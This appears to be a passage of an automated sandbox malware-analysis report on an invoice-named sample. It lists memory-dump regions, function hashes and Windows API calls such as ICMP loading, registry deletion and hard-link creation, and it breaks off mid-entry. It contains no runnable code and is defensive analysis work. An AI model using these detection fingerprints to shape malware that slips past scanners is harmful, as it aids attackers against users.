                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Menu$InfoItem$Draw_malloc
                              • String ID: 0
                              • API String ID: 772068139-4108050209
                              • Opcode ID: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                              • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                              • Opcode Fuzzy Hash: 15a76c8cdafcabc0d330a2bd3afc87876622b04de3c231e264bb1fcb70d0c272
                              • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcslen$_wcscpy
                              • String ID: 3, 3, 8, 1
                              • API String ID: 3469035223-357260408
                              • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                              • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                              • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                              • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                              • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpCloseHandle
                              • API String ID: 2574300362-3530519716
                              • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                              • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                              • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                              • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                              • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpCreateFile
                              • API String ID: 2574300362-275556492
                              • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                              • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                              • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                              • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                              • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpSendEcho
                              • API String ID: 2574300362-58917771
                              • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                              • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                              • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                              • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                              APIs
                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: RegDeleteKeyExW$advapi32.dll
                              • API String ID: 2574300362-4033151799
                              • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                              • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                              • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                              • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                              • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                              • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                              • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 0047950F
                              • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                              • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                              • VariantClear.OLEAUT32(?), ref: 00479650
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Variant$AllocClearCopyInitString
                              • String ID:
                              • API String ID: 2808897238-0
                              • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                              • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                              • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                              • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                              APIs
                              • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                              • __itow.LIBCMT ref: 004699CD
                                • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                              • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                              • __itow.LIBCMT ref: 00469A97
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend$__itow
                              • String ID:
                              • API String ID: 3379773720-0
                              • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                              • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                              • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                              • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00449A4A
                              • ScreenToClient.USER32(?,?), ref: 00449A80
                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$ClientMoveRectScreen
                              • String ID:
                              • API String ID: 3880355969-0
                              • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                              • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                              • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                              • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                              • String ID:
                              • API String ID: 2782032738-0
                              • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                              • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                              • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                              • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                              APIs
                              • ClientToScreen.USER32(00000000,?), ref: 0044169A
                              • GetWindowRect.USER32(?,?), ref: 00441722
                              • PtInRect.USER32(?,?,?), ref: 00441734
                              • MessageBeep.USER32(00000000), ref: 004417AD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Rect$BeepClientMessageScreenWindow
                              • String ID:
                              • API String ID: 1352109105-0
                              • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                              • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                              • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                              • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                              APIs
                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                              • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                              • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CreateHardLink$DeleteErrorFileLast
                              • String ID:
                              • API String ID: 3321077145-0
                              • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                              • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                              • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                              • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                              • __isleadbyte_l.LIBCMT ref: 004208A6
                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              • String ID:
                              • API String ID: 3058430110-0
                              • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                              • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                              • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                              • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                              APIs
                              • GetParent.USER32(?), ref: 004503C8
                              • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                              • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                              • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Proc$Parent
                              • String ID:
                              • API String ID: 2351499541-0
                              • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                              • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                              • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                              • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                              • TranslateMessage.USER32(?), ref: 00442B01
                              • DispatchMessageW.USER32(?), ref: 00442B0B
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Message$Peek$DispatchTranslate
                              • String ID:
                              • API String ID: 1795658109-0
                              • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                              • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                              • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                              • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                              APIs
                              • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                              • GetCaretPos.USER32(?), ref: 004743B2
                              • ClientToScreen.USER32(00000000,?), ref: 004743E8
                              • GetForegroundWindow.USER32 ref: 004743EE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                              • String ID:
                              • API String ID: 2759813231-0
                              • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                              • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
